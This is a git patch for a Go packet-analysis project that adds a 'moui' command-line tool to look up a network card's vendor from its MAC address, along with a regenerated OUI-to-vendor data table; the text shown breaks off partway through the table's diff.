From e7146081a6fa4edc24eb932ef540ac516d4638a1 Mon Sep 17 00:00:00 2001 From: shadowy-pycoder <35629483+shadowy-pycoder@users.noreply.github.com> Date: Sun, 13 Jul 2025 06:19:35 +0300 Subject: [PATCH 1/3] Added moui CLI, now it is possible to get a full OUI and these combined with MAC --- cmd/moui/main.go | 36 + oui/data.go | 19443 ++++++++++++++++++++++++++++++++++++++++- oui/magefiles/gen.go | 28 +- oui/oui.csv | 314 +- oui/oui.go | 32 +- 5 files changed, 19591 insertions(+), 262 deletions(-) create mode 100644 cmd/moui/main.go diff --git a/cmd/moui/main.go b/cmd/moui/main.go new file mode 100644 index 0000000..d65079f --- /dev/null +++ b/cmd/moui/main.go @@ -0,0 +1,36 @@ +package main + +import ( + "fmt" + "net" + "os" + + "github.com/shadowy-pycoder/mshark/oui" +) + +var app = "moui" + +func root(args []string) error { + if len(args) != 1 { + fmt.Fprintf(os.Stderr, "Usage: moui \n") + os.Exit(2) + } + mac, err := net.ParseMAC(args[0]) + if err != nil { + return err + } + vendor := oui.VendorFromMAC(mac) + if vendor != "" { + fmt.Println(vendor) + } + vendor = oui.VendorWithMAC(mac) + fmt.Println(vendor) + return nil +} + +func main() { + if err := root(os.Args[1:]); err != nil { + fmt.Fprintf(os.Stderr, "%s: %v\n", app, err) + os.Exit(2) + } +} diff --git a/oui/data.go b/oui/data.go index 210028b..a0105aa 100644 --- a/oui/data.go +++ b/oui/data.go @@ -1075,7 +1075,7 @@ var ouis = map[string]int{ "00042f": 11079, // International Communications Products "000430": 443, // Netgem "000431": 18434, // GlobalStreams - "000432": 4338, // Voyetra Turtle Beach + "000432": 4339, // Voyetra Turtle Beach "000433": 7320, // Cyberboard AS "000434": 7321, // Accelent "000435": 271, // InfiNet @@ -5944,7 +5944,7 @@ var ouis = map[string]int{ "001750": 2581, // GSI GroupMicroE "001751": 2583, // Online "001752": 13303, // Dags - "001753": 15665, // nFore Technology + "001753": 15664, // nFore Technology "001754": 14090, // Arkino HiTOP "001755": 2582, // GE Security "001756": 14091, // Vinci Labs @@ -10820,9 +10820,9 @@ var ouis = map[string]int{ "0050ff": 7577, // Hakko Electronics "0051ed": 276, // LG Innotek "005200": 19244, // PacketPWEthA - "005201": 19248, // PacketPWEthB - "005202": 19243, // BFD for VXLAN - "005213": 19251, // Proxy Mobile IPv6 + "005201": 19251, // PacketPWEthB + "005202": 19247, // BFD for VXLAN + "005213": 19250, // Proxy Mobile IPv6 "005218": 993, // Wuxi Keboda Electron "005245": 11905, // Ganatechwin "0052c2": 624, // peiker acustic @@ -11693,7 +11693,7 @@ var ouis = map[string]int{ "0081f9": 52, // Texas Instruments "008320": 111, // Huawei Device "00841e": 20, // Cisco Meraki - "008497": 4321, // Shenzhen MiaoMing Intelligent Technology + "008497": 4320, // Shenzhen MiaoMing Intelligent Technology "0084ed": 599, // Lexmark International "008667": 276, // LG Innotek "00869c": 89, // Palo Alto Networks @@ -13279,7 +13279,7 @@ var ouis = map[string]int{ "00fd45": 4175, // Hewlett Packard Enterprise "00fd4c": 5546, // Nevatec "00fec8": 4, // Cisco - "01005e": 19247, // IPv4 Multicast + "01005e": 19249, // IPv4 Multicast "020701": 7844, // Racal Datacom "021c7c": 11634, // Perq "026086": 3914, // Logic Replacement Tech @@ -13501,7 +13501,7 @@ var ouis = map[string]int{ "048c16": 15, // Huawei Technologies "048c9a": 111, // Huawei Device "048d38": 8057, // Netis Technology - "048f00": 8178, // Rong Paisa Electronics + "048f00": 8177, // Rong Paisa Electronics "049081": 8417, // Pensando "0490c0": 11899, // Forvia "049162": 68, // Microchip Technology @@ -13552,7 +13552,7 @@ var ouis = map[string]int{ "04b3b6": 9848, // Seamap UK "04b429": 85, // Samsung Electronics "04b466": 9836, // Bsp - "04b4fe": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "04b4fe": 4317, // AVM Audiovisuelles Marketing und Computersysteme "04b5c1": 157, // Itel Mobile "04b648": 8823, // Zenner "04b6be": 4162, // Cig Shanghai @@ -14106,7 +14106,7 @@ var ouis = map[string]int{ "08b4cf": 1683, // Abicom International "08b4d2": 25, // Intel "08b61f": 14, // Espressif - "08b657": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "08b657": 4317, // AVM Audiovisuelles Marketing und Computersysteme "08b738": 9375, // Lite On Technogy "08b7ec": 9654, // Wireless Seismic "08b8d0": 469, // Chipsea Technologies Shenzhen @@ -14355,7 +14355,7 @@ var ouis = map[string]int{ "0c715d": 85, // Samsung Electronics "0c718c": 265, // TCT mobile "0c722c": 81, // Tp Link Technologies - "0c7274": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "0c7274": 4317, // AVM Audiovisuelles Marketing und Computersysteme "0c72d9": 11, // zte "0c7329": 449, // Sercomm "0c73be": 8819, // Dongguan Haimai Electronie Technology @@ -14443,7 +14443,7 @@ var ouis = map[string]int{ "0c9f71": 210, // Dolphin Electronics DongGuan "0ca06c": 4755, // Industrial Cyber Sensing "0ca138": 15537, // BLiNQ Networks - "0ca2f4": 8177, // Chameleon Technology UK + "0ca2f4": 8178, // Chameleon Technology UK "0ca402": 2114, // Alcatel Lucent IPD "0ca42a": 8959, // OB Telecom Electronic Technology "0ca64c": 4294, // Hangzhou Ezviz Software @@ -15614,7 +15614,7 @@ var ouis = map[string]int{ "189a67": 16808, // CSE Servelec "189ba5": 12, // IEEE Registration Authority "189c27": 4246, // Commscope - "189c2c": 4320, // Dongguan Huayin Electronic Technology + "189c2c": 4321, // Dongguan Huayin Electronic Technology "189c5d": 4, // Cisco "189ce1": 84, // Arista Networks "189e2c": 111, // Huawei Device @@ -16109,7 +16109,7 @@ var ouis = map[string]int{ "1cea1b": 76, // Nokia "1ceaac": 160, // Beijing Xiaomi Mobile Software "1cec72": 10971, // Allradio - "1ced6f": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "1ced6f": 4317, // AVM Audiovisuelles Marketing und Computersysteme "1ceec9": 1464, // Elo touch solutions "1ceee8": 1359, // Ilshin Elecom "1cef03": 329, // Guangzhou V SOLUTION Electronic Technology @@ -16609,7 +16609,7 @@ var ouis = map[string]int{ "2441fe": 56, // Wistron Neweb "2442bc": 8374, // Alinco "2442e3": 11911, // Shenzhen Ai Thinker Technology - "2443e2": 15670, // DASAN Network Solutions + "2443e2": 15671, // DASAN Network Solutions "244427": 15, // Huawei Technologies "24456b": 111, // Huawei Device "244597": 17130, // GEMUE GebrMueller Apparatebau @@ -17381,7 +17381,7 @@ var ouis = map[string]int{ "2c3a28": 17165, // Fagor Electrónica "2c3a91": 111, // Huawei Device "2c3ae8": 14, // Espressif - "2c3afd": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "2c3afd": 4317, // AVM Audiovisuelles Marketing und Computersysteme "2c3b70": 42, // AzureWave Technology "2c3bfd": 13002, // Netstor Technology "2c3c05": 11968, // Marinesync @@ -17505,7 +17505,7 @@ var ouis = map[string]int{ "2c8d37": 15759, // Virtium "2c8db1": 25, // Intel "2c9127": 5990, // Eintechno - "2c91ab": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "2c91ab": 4317, // AVM Audiovisuelles Marketing und Computersysteme "2c922c": 5405, // Kishu Giken Kogyou "2c93fb": 376, // Sercomm France "2c9452": 15, // Huawei Technologies @@ -17562,7 +17562,7 @@ var ouis = map[string]int{ "2cae2b": 85, // Samsung Electronics "2cb05d": 496, // Netgear "2cb0df": 1896, // Soliton Technologies - "2cb0fd": 4321, // Shenzhen MiaoMing Intelligent Technology + "2cb0fd": 4320, // Shenzhen MiaoMing Intelligent Technology "2cb115": 537, // Integrated Device Technology Malaysia SdnBhd "2cb21a": 701, // Phicomm Shanghai "2cb301": 22, // Honor Device @@ -17582,7 +17582,7 @@ var ouis = map[string]int{ "2cbe97": 5652, // Ingenieurbuero Bickele und Buehler "2cbeeb": 4122, // Nothing Technology "2cbeee": 4122, // Nothing Technology - "2cc1f4": 4334, // Nokia Solutions and Networks India Private + "2cc1f4": 4337, // Nokia Solutions and Networks India Private "2cc253": 48, // Apple "2cc260": 2237, // Oracle "2cc3e6": 644, // Shenzhen Bilian Electronic @@ -17984,7 +17984,7 @@ var ouis = map[string]int{ "30d386": 11, // zte "30d46a": 1500, // Autosales "30d4e2": 15, // Huawei Technologies - "30d51f": 15663, // Prolights + "30d51f": 15665, // Prolights "30d53e": 48, // Apple "30d587": 85, // Samsung Electronics "30d659": 16086, // Merging Technologies @@ -18331,7 +18331,7 @@ var ouis = map[string]int{ "3408bc": 48, // Apple "3408e1": 52, // Texas Instruments "340962": 53, // Hangzhou Hikvision Digital Technology - "3409c9": 4320, // Dongguan Huayin Electronic Technology + "3409c9": 4321, // Dongguan Huayin Electronic Technology "340a22": 16421, // Top Access Electronics "340a33": 319, // D Link International "340a98": 15, // Huawei Technologies @@ -18681,7 +18681,7 @@ var ouis = map[string]int{ "34e0cf": 11, // zte "34e0d7": 13402, // Dongguan Qisheng Electronics Industrial "34e12d": 25, // Intel - "34e1a9": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "34e1a9": 4317, // AVM Audiovisuelles Marketing und Computersysteme "34e1d1": 12, // IEEE Registration Authority "34e2fd": 48, // Apple "34e380": 798, // Genexis BV @@ -18769,7 +18769,7 @@ var ouis = map[string]int{ "380f4a": 48, // Apple "380fad": 15, // Huawei Technologies "380fe4": 12979, // Dedicated Network Partners - "3810d5": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "3810d5": 4317, // AVM Audiovisuelles Marketing und Computersysteme "3810f0": 4175, // Hewlett Packard Enterprise "38127b": 4456, // Crenet Labs "38141b": 8250, // Secure Letter @@ -18818,7 +18818,7 @@ var ouis = map[string]int{ "38295a": 65, // Guangdong Oppo Mobile Telecommunications "3829dd": 5108, // ONvocal "382a19": 15957, // Technica Engineering - "382a8b": 15665, // nFore Technology + "382a8b": 15664, // nFore Technology "382a8c": 421, // ALL Winner Hong Kong "382b78": 9013, // Eco Plugs Enterprise "382c4a": 387, // ASUSTek COMPUTER @@ -18924,7 +18924,7 @@ var ouis = map[string]int{ "387a0e": 25, // Intel "387a3c": 5, // Fiberhome Telecommunication Technologies "387acc": 644, // Shenzhen Bilian Electronic - "387b01": 4321, // Shenzhen MiaoMing Intelligent Technology + "387b01": 4320, // Shenzhen MiaoMing Intelligent Technology "387b47": 12847, // Akela "387c76": 58, // Universal Global Scientific Industrial "387f8b": 48, // Apple @@ -19042,7 +19042,7 @@ var ouis = map[string]int{ "38c85c": 1155, // Cisco SPVTG "38c986": 48, // Apple "38c9a9": 16578, // SMART High Reliability Solutions - "38ca73": 4321, // Shenzhen MiaoMing Intelligent Technology + "38ca73": 4320, // Shenzhen MiaoMing Intelligent Technology "38ca84": 19, // Hp "38ca97": 9183, // Contour Design "38cada": 48, // Apple @@ -19201,7 +19201,7 @@ var ouis = map[string]int{ "3c2763": 1784, // SLE quality engineering "3c286d": 203, // Google "3c28a6": 4692, // Alcatel Lucent Enterprise China - "3c2af4": 4335, // Brother Industries + "3c2af4": 4334, // Brother Industries "3c2c30": 104, // Dell "3c2c94": 5205, // 杭州德澜科技有限公司(HangZhou Delan Technology) "3c2c99": 82, // Edgecore Networks @@ -19226,7 +19226,7 @@ var ouis = map[string]int{ "3c363d": 76, // Nokia "3c366a": 15, // Huawei Technologies "3c36e4": 4246, // Commscope - "3c3712": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "3c3712": 4317, // AVM Audiovisuelles Marketing und Computersysteme "3c3786": 496, // Netgear "3c3824": 39, // Xiaomi Communications "3c3888": 13120, // ConnectQuest @@ -19397,7 +19397,7 @@ var ouis = map[string]int{ "3ca37e": 15, // Huawei Technologies "3ca581": 140, // vivo Mobile Communication "3ca616": 140, // vivo Mobile Communication - "3ca62f": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "3ca62f": 4317, // AVM Audiovisuelles Marketing und Computersysteme "3ca6f6": 48, // Apple "3ca72b": 1826, // MRV Communications Networks "3ca7ae": 11, // zte @@ -19580,7 +19580,7 @@ var ouis = map[string]int{ "402508": 11912, // Highway 9 Networks "4025c2": 25, // Intel "402619": 48, // Apple - "40268e": 15671, // Shenzhen Photon Leap Technology + "40268e": 15670, // Shenzhen Photon Leap Technology "40270b": 1534, // Mobileeco "4027a8": 20, // Cisco Meraki "402814": 1213, // RFI Engineering @@ -19731,7 +19731,7 @@ var ouis = map[string]int{ "408b07": 639, // Actiontec Electronics "408bf6": 845, // Shenzhen TCL New Technology "408c1f": 65, // Guangdong Oppo Mobile Telecommunications - "408c4c": 4321, // Shenzhen MiaoMing Intelligent Technology + "408c4c": 4320, // Shenzhen MiaoMing Intelligent Technology "408d5c": 522, // Giga Byte Technology "408e2c": 151, // Microsoft "408edf": 111, // Huawei Device @@ -20041,7 +20041,7 @@ var ouis = map[string]int{ "444c0c": 48, // Apple "444ca8": 84, // Arista Networks "444e1a": 85, // Samsung Electronics - "444e6d": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "444e6d": 4317, // AVM Audiovisuelles Marketing und Computersysteme "444f5e": 16993, // Pan Studios "444f8e": 192, // WiZ "4451db": 9712, // Raytheon BBN Technologies @@ -20437,7 +20437,7 @@ var ouis = map[string]int{ "485aea": 5, // Fiberhome Telecommunication Technologies "485b39": 387, // ASUSTek COMPUTER "485c2c": 115, // Earda Technologies - "485d35": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "485d35": 4317, // AVM Audiovisuelles Marketing und Computersysteme "485d36": 8732, // Verizon "485d60": 42, // AzureWave Technology "485deb": 4745, // Just Add Power @@ -21066,7 +21066,7 @@ var ouis = map[string]int{ "4cf737": 1968, // SamJi Electronics "4cf95d": 15, // Huawei Technologies "4cfa9a": 11895, // Shenzhen Quanxing Technology - "4cfac9": 8173, // BWS IoT + "4cfac9": 8174, // BWS IoT "4cfaca": 797, // Cambridge IndustriesGroup "4cfb45": 15, // Huawei Technologies "4cfbf4": 8435, // Optimal Audio @@ -21351,7 +21351,7 @@ var ouis = map[string]int{ "50a054": 12822, // Actineon "50a0a4": 76, // Nokia "50a0bf": 5406, // Alba Fiber - "50a132": 4321, // Shenzhen MiaoMing Intelligent Technology + "50a132": 4320, // Shenzhen MiaoMing Intelligent Technology "50a1f3": 111, // Huawei Device "50a4c8": 85, // Samsung Electronics "50a4d0": 12, // IEEE Registration Authority @@ -21393,7 +21393,7 @@ var ouis = map[string]int{ "50c275": 27, // GN Audio AS "50c2e8": 188, // Cloud Network Technology Singapore Pte "50c2ed": 27, // GN Audio AS - "50c3a2": 15665, // nFore Technology + "50c3a2": 15664, // nFore Technology "50c4dd": 300, // Buffalo "50c58d": 28, // Juniper Networks "50c68e": 15900, // Biwin Semiconductor HK Limted @@ -21444,7 +21444,7 @@ var ouis = map[string]int{ "50e4e0": 4175, // Hewlett Packard Enterprise "50e538": 53, // Hangzhou Hikvision Digital Technology "50e549": 522, // Giga Byte Technology - "50e636": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "50e636": 4317, // AVM Audiovisuelles Marketing und Computersysteme "50e666": 12523, // Shenzhen Techtion Electronics "50e7a0": 225, // Renesas Electronics Penang SdnBhd "50e7b7": 140, // vivo Mobile Communication @@ -22306,7 +22306,7 @@ var ouis = map[string]int{ "5c46b0": 614, // SIMCom Wireless Solutions "5c475e": 585, // Ring "5c4842": 8090, // Hangzhou Anysoft Information Technology - "5c4979": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "5c4979": 4317, // AVM Audiovisuelles Marketing und Computersysteme "5c497d": 85, // Samsung Electronics "5c49fa": 15811, // Shenzhen Guowei Shidai Communication Equipement "5c4a1f": 129, // Sichuan Tianyi Comheart Telecom @@ -22541,7 +22541,7 @@ var ouis = map[string]int{ "5ce0ca": 9314, // FeiTian United Beijing System Technology "5ce0f6": 5520, // NICbr Nucleo de Informacao e Coordenacao do Ponto BR "5ce176": 4, // Cisco - "5ce1a4": 4339, // Pleneo + "5ce1a4": 4338, // Pleneo "5ce223": 17200, // Delphin Technology "5ce286": 1007, // Nortel Networks "5ce28c": 106, // Zyxel Communications @@ -22775,7 +22775,7 @@ var ouis = map[string]int{ "60720b": 4430, // BLU Products "60735c": 4, // Cisco "6073bc": 11, // zte - "6073c8": 4338, // Voyetra Turtle Beach + "6073c8": 4339, // Voyetra Turtle Beach "60748d": 13025, // Atmaca Elektronik "6074b1": 4310, // Home Control Singapore Pte "6074f4": 13, // Private @@ -22831,7 +22831,7 @@ var ouis = map[string]int{ "6096a4": 15, // Huawei Technologies "6097dd": 16121, // MicroSys Electronics "609813": 16122, // Shanghai Visking Digital Technology - "609849": 4334, // Nokia Solutions and Networks India Private + "609849": 4337, // Nokia Solutions and Networks India Private "609866": 52, // Texas Instruments "6099d1": 1270, // Vuzix Lenovo "609aa4": 17125, // Gvi Security @@ -22870,7 +22870,7 @@ var ouis = map[string]int{ "60b387": 12614, // Synergics Technologies "60b3c4": 13461, // Elber "60b4f7": 12611, // Plume Design - "60b58d": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "60b58d": 4317, // AVM Audiovisuelles Marketing und Computersysteme "60b606": 13159, // Phorus "60b617": 5, // Fiberhome Telecommunication Technologies "60b647": 231, // Silicon Laboratories @@ -23155,7 +23155,7 @@ var ouis = map[string]int{ "646772": 4309, // Sercomm Philippines "6467cd": 15, // Huawei Technologies "64680c": 805, // Comtrend - "64681a": 15670, // DASAN Network Solutions + "64681a": 15671, // DASAN Network Solutions "646876": 4156, // Edifier International "64694e": 52, // Texas Instruments "6469bc": 1848, // Hytera Communications @@ -24638,7 +24638,7 @@ var ouis = map[string]int{ "7440bb": 860, // Hon Hai Precision Ind "7440be": 276, // LG Innotek "744218": 48, // Apple - "74427f": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "74427f": 4317, // AVM Audiovisuelles Marketing und Computersysteme "74428b": 48, // Apple "744401": 496, // Netgear "74452d": 111, // Huawei Device @@ -24802,7 +24802,7 @@ var ouis = map[string]int{ "74a4a7": 17100, // QRS Music Technologies "74a4b5": 16623, // Powerleader Science and Technology "74a528": 15, // Huawei Technologies - "74a57e": 15664, // Panasonic Ecology + "74a57e": 15663, // Panasonic Ecology "74a58c": 52, // Texas Instruments "74a5c2": 328, // Kyocera "74a6cd": 48, // Apple @@ -25198,7 +25198,7 @@ var ouis = map[string]int{ "788daf": 3, // Sagemcom Broadband SAS "788df7": 504, // Hitron Technologies "788e33": 9010, // Jiangsu SEUIC Technology - "788e45": 8172, // Jizaie + "788e45": 8173, // Jizaie "7890a2": 11, // zte "7891de": 4459, // Guangdong ACIGA Science Technology "7891e9": 205, // Raisecom Technology @@ -25801,7 +25801,7 @@ var ouis = map[string]int{ "7cfe4e": 5060, // Shenzhen Safe vision Technology "7cfe62": 19212, // ShenZhen XinZhongXin Technology "7cfe90": 4318, // Mellanox Technologies - "7cff4d": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "7cff4d": 4317, // AVM Audiovisuelles Marketing und Computersysteme "7cff62": 1319, // Huizhou Super Electron Technology "80000b": 25, // Intel "800010": 787, // At T @@ -25858,7 +25858,7 @@ var ouis = map[string]int{ "802278": 266, // China Mobile IOT "8022a7": 393, // NEC Platforms "8022fa": 157, // Itel Mobile - "802395": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "802395": 4317, // AVM Audiovisuelles Marketing und Computersysteme "80248f": 4, // Cisco "802511": 157, // Itel Mobile "802689": 319, // D Link International @@ -26332,7 +26332,7 @@ var ouis = map[string]int{ "846aed": 13130, // Wireless Tsukamoto "846b48": 4628, // ShenZhen EepuLink "846eb1": 13335, // Park Assist - "846ebc": 4334, // Nokia Solutions and Networks India Private + "846ebc": 4337, // Nokia Solutions and Networks India Private "846fce": 65, // Guangdong Oppo Mobile Telecommunications "847051": 153, // Alpsalpine "8470d7": 60, // eero @@ -27306,7 +27306,7 @@ var ouis = map[string]int{ "8ce2da": 1173, // Circle Media "8ce38e": 16164, // Kioxia "8ce468": 12191, // Guangzhou Sageran Technology - "8ce4db": 4321, // Shenzhen MiaoMing Intelligent Technology + "8ce4db": 4320, // Shenzhen MiaoMing Intelligent Technology "8ce5c0": 85, // Samsung Electronics "8ce5ef": 15, // Huawei Technologies "8ce748": 53, // Hangzhou Hikvision Digital Technology @@ -27315,7 +27315,7 @@ var ouis = map[string]int{ "8ce9b4": 495, // Zhejiang Dahua Technology "8ce9ee": 25, // Intel "8ce9ff": 104, // Dell - "8cea12": 4321, // Shenzhen MiaoMing Intelligent Technology + "8cea12": 4320, // Shenzhen MiaoMing Intelligent Technology "8cea1b": 82, // Edgecore Networks "8cea48": 85, // Samsung Electronics "8cea88": 8084, // Chengdu Yocto Communication Technology @@ -27350,12 +27350,12 @@ var ouis = map[string]int{ "8cfe74": 263, // Ruckus Wireless "8cfeb4": 4900, // Vsoontech Electronics "900000": 19242, // MPLS TP p2p - "900001": 19245, // BFD on LAG Interfaces - "900002": 19249, // AllL1MI ISs - "900003": 19246, // AllL2MI ISs + "900001": 19246, // BFD on LAG Interfaces + "900002": 19248, // AllL1MI ISs + "900003": 19243, // AllL2MI ISs "90004e": 860, // Hon Hai Precision Ind "9000db": 85, // Samsung Electronics - "900100": 19250, // TRILL OAM + "900100": 19245, // TRILL OAM "900117": 15, // Huawei Technologies "90013b": 3, // Sagemcom Broadband SAS "900218": 309, // Sky Uk @@ -28353,7 +28353,7 @@ var ouis = map[string]int{ "94dbda": 15, // Huawei Technologies "94dc4e": 568, // AEVspols ro "94dd3f": 9694, // A+V Link Technologies - "94ddf8": 4335, // Brother Industries + "94ddf8": 4334, // Brother Industries "94de0e": 9530, // SmartOptics AS "94de80": 522, // Giga Byte Technology "94deb8": 231, // Silicon Laboratories @@ -28647,7 +28647,7 @@ var ouis = map[string]int{ "9897d1": 122, // MitraStar Technology "9898fb": 203, // Google "989ab9": 11, // zte - "989bcb": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "989bcb": 4317, // AVM Audiovisuelles Marketing und Computersysteme "989c57": 15, // Huawei Technologies "989d39": 4319, // China Mobile Group Device "989d40": 4322, // Miwa Lock @@ -28669,7 +28669,7 @@ var ouis = map[string]int{ "98a878": 11845, // Agnigate Technologies Private "98a92d": 21, // New H3C Technologies "98a942": 8478, // Guangzhou Tozed Kangwei Intelligent Technology - "98a965": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "98a965": 4317, // AVM Audiovisuelles Marketing und Computersysteme "98aa3c": 1057, // Will i tech "98aad7": 13180, // Blue Wave Networking "98aafc": 12, // IEEE Registration Authority @@ -29235,7 +29235,7 @@ var ouis = map[string]int{ "a01ae3": 26, // Edgecore Americas Networking "a01b29": 3, // Sagemcom Broadband SAS "a01b9e": 85, // Samsung Electronics - "a01bd6": 4337, // Nautitech Mining + "a01bd6": 4335, // Nautitech Mining "a01c05": 5458, // Nimax Telecom "a01c87": 4387, // Union Man Technology "a01c8d": 15, // Huawei Technologies @@ -29601,7 +29601,7 @@ var ouis = map[string]int{ "a401de": 4309, // Sercomm Philippines "a402b7": 72, // Amazon Technologies "a402b9": 25, // Intel - "a40450": 15665, // nFore Technology + "a40450": 15664, // nFore Technology "a4056e": 382, // Tiinlab "a4059e": 16601, // STA Infinity LLP "a405d6": 4246, // Commscope @@ -30939,7 +30939,7 @@ var ouis = map[string]int{ "b07adf": 15, // Huawei Technologies "b07b25": 104, // Dell "b07c51": 263, // Ruckus Wireless - "b07c8e": 4335, // Brother Industries + "b07c8e": 4334, // Brother Industries "b07d47": 4, // Cisco "b07d62": 9533, // Dipl IngHHorstmann "b07d64": 25, // Intel @@ -31125,7 +31125,7 @@ var ouis = map[string]int{ "b0f1bc": 1785, // Dhemax Ingenieros Ltda "b0f1d8": 48, // Apple "b0f1ec": 286, // AMPAK Technology - "b0f208": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "b0f208": 4317, // AVM Audiovisuelles Marketing und Computersysteme "b0f2f6": 85, // Samsung Electronics "b0f3e9": 19236, // PATEO CONNECT Xiamen "b0f530": 504, // Hitron Technologies @@ -31198,7 +31198,7 @@ var ouis = map[string]int{ "b4205b": 65, // Guangdong Oppo Mobile Telecommunications "b4211d": 16923, // Beijing GuangXin Technology "b4218a": 5574, // Dog Hunter - "b42200": 4335, // Brother Industries + "b42200": 4334, // Brother Industries "b42330": 463, // Itron "b423a2": 203, // Google "b424e7": 9204, // Codetek Technology @@ -31516,7 +31516,7 @@ var ouis = map[string]int{ "b4fbe4": 125, // Ubiquiti "b4fbf9": 15, // Huawei Technologies "b4fc75": 5742, // SEMA ElectronicsHK - "b4fc7d": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "b4fc7d": 4317, // AVM Audiovisuelles Marketing und Computersysteme "b4fe8c": 16704, // Centro Sicurezza Italia "b4ff98": 15, // Huawei Technologies "b80018": 5005, // Htel @@ -31735,7 +31735,7 @@ var ouis = map[string]int{ "b898b0": 16777, // Atlona "b898f7": 5318, // Gionee Communication EquipmentShenZhen "b89919": 8842, // 7signal Solutions - "b899ae": 4321, // Shenzhen MiaoMing Intelligent Technology + "b899ae": 4320, // Shenzhen MiaoMing Intelligent Technology "b899b0": 5174, // Cohere Technologies "b89a2a": 25, // Intel "b89a9a": 8617, // Xin Shi Jia Technology Beijing @@ -31969,7 +31969,7 @@ var ouis = map[string]int{ "bc2d98": 9184, // ThinGlobal "bc2def": 187, // Realme Chongqing Mobile Telecommunications "bc2e48": 4246, // Commscope - "bc2ec3": 4317, // Shenzhen Tianruixiang Communication Equipment + "bc2ec3": 4316, // Shenzhen Tianruixiang Communication Equipment "bc2ef6": 111, // Huawei Device "bc2f3d": 140, // vivo Mobile Communication "bc305b": 104, // Dell @@ -32026,7 +32026,7 @@ var ouis = map[string]int{ "bc4dfb": 504, // Hitron Technologies "bc4e3c": 9769, // Core Staff "bc4e5d": 12772, // ZhongMiao Technology - "bc515f": 4334, // Nokia Solutions and Networks India Private + "bc515f": 4337, // Nokia Solutions and Networks India Private "bc51fe": 5480, // Swann communications "bc5274": 85, // Samsung Electronics "bc52b4": 76, // Nokia @@ -33082,7 +33082,7 @@ var ouis = map[string]int{ "c80c53": 4319, // China Mobile Group Device "c80cc8": 15, // Huawei Technologies "c80d32": 15995, // Holoplot - "c80e14": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "c80e14": 4317, // AVM Audiovisuelles Marketing und Computersysteme "c80e77": 923, // Le Shi Zhi Xin Electronic Technology Tianjin "c80e95": 9322, // OmniLync "c8102f": 496, // Netgear @@ -33765,7 +33765,7 @@ var ouis = map[string]int{ "cccccc": 231, // Silicon Laboratories "ccccea": 8126, // Phoenix Contact "cccd64": 560, // SM Electronic - "ccce1e": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "ccce1e": 4317, // AVM Audiovisuelles Marketing und Computersysteme "ccce40": 17072, // Janteq "cccf83": 4162, // Cig Shanghai "ccd083": 4175, // Hewlett Packard Enterprise @@ -33867,7 +33867,7 @@ var ouis = map[string]int{ "d011e5": 48, // Apple "d01242": 16486, // Bios "d01255": 30, // Hui Zhou Gaoshengda Technology - "d012cb": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "d012cb": 4317, // AVM Audiovisuelles Marketing und Computersysteme "d0131e": 1796, // Sunrex Technology "d013fd": 499, // LG Electronics Mobile Communications "d01411": 12, // IEEE Registration Authority @@ -34260,7 +34260,7 @@ var ouis = map[string]int{ "d4224e": 915, // Alcatel Lucent "d422cd": 11947, // Movella Technologies BV "d42493": 8525, // GW Technologies - "d424dd": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "d424dd": 4317, // AVM Audiovisuelles Marketing und Computersysteme "d4258b": 25, // Intel "d425cc": 12, // IEEE Registration Authority "d42751": 1519, // Infopia @@ -35053,7 +35053,7 @@ var ouis = map[string]int{ "dc1057": 48, // Apple "dc121d": 15, // Huawei Technologies "dc152d": 4319, // China Mobile Group Device - "dc15c8": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "dc15c8": 4317, // AVM Audiovisuelles Marketing und Computersysteme "dc15db": 16408, // Ge Ruili Intelligent Technology Beijing "dc16a2": 9595, // Medtronic Diabetes "dc16b2": 15, // Huawei Technologies @@ -35108,7 +35108,7 @@ var ouis = map[string]int{ "dc3757": 537, // Integrated Device Technology Malaysia SdnBhd "dc37d2": 5600, // Hunan HKT Electronic Technology "dc38e1": 28, // Juniper Networks - "dc396f": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "dc396f": 4317, // AVM Audiovisuelles Marketing und Computersysteme "dc3979": 4, // Cisco "dc3a5e": 1113, // Roku "dc3c2e": 5669, // Manufacturing System Insights @@ -35410,7 +35410,7 @@ var ouis = map[string]int{ "e006e6": 860, // Hon Hai Precision Ind "e0071b": 4175, // Hewlett Packard Enterprise "e007c2": 278, // Fujian Star Net Communication - "e00855": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "e00855": 4317, // AVM Audiovisuelles Marketing und Computersysteme "e00871": 272, // Dongguan Liesheng Electronic "e009bf": 622, // Shenzhen Tong Bo Wei Technology "e00af6": 185, // Liteon Technology @@ -35464,7 +35464,7 @@ var ouis = map[string]int{ "e0276c": 250, // Guangzhou Shiyuan Electronic Technology "e0280a": 4298, // TP Link "e02861": 15, // Huawei Technologies - "e0286d": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "e0286d": 4317, // AVM Audiovisuelles Marketing und Computersysteme "e028b1": 101, // Shenzhen Skyworth Digital Technology "e02967": 139, // HMD Global "e02a66": 4, // Cisco @@ -35750,7 +35750,7 @@ var ouis = map[string]int{ "e0e62e": 265, // TCT mobile "e0e631": 9175, // Snb Technologies "e0e656": 395, // Nethesis - "e0e6e3": 8174, // TeamF1 Networks + "e0e6e3": 8172, // TeamF1 Networks "e0e751": 34, // 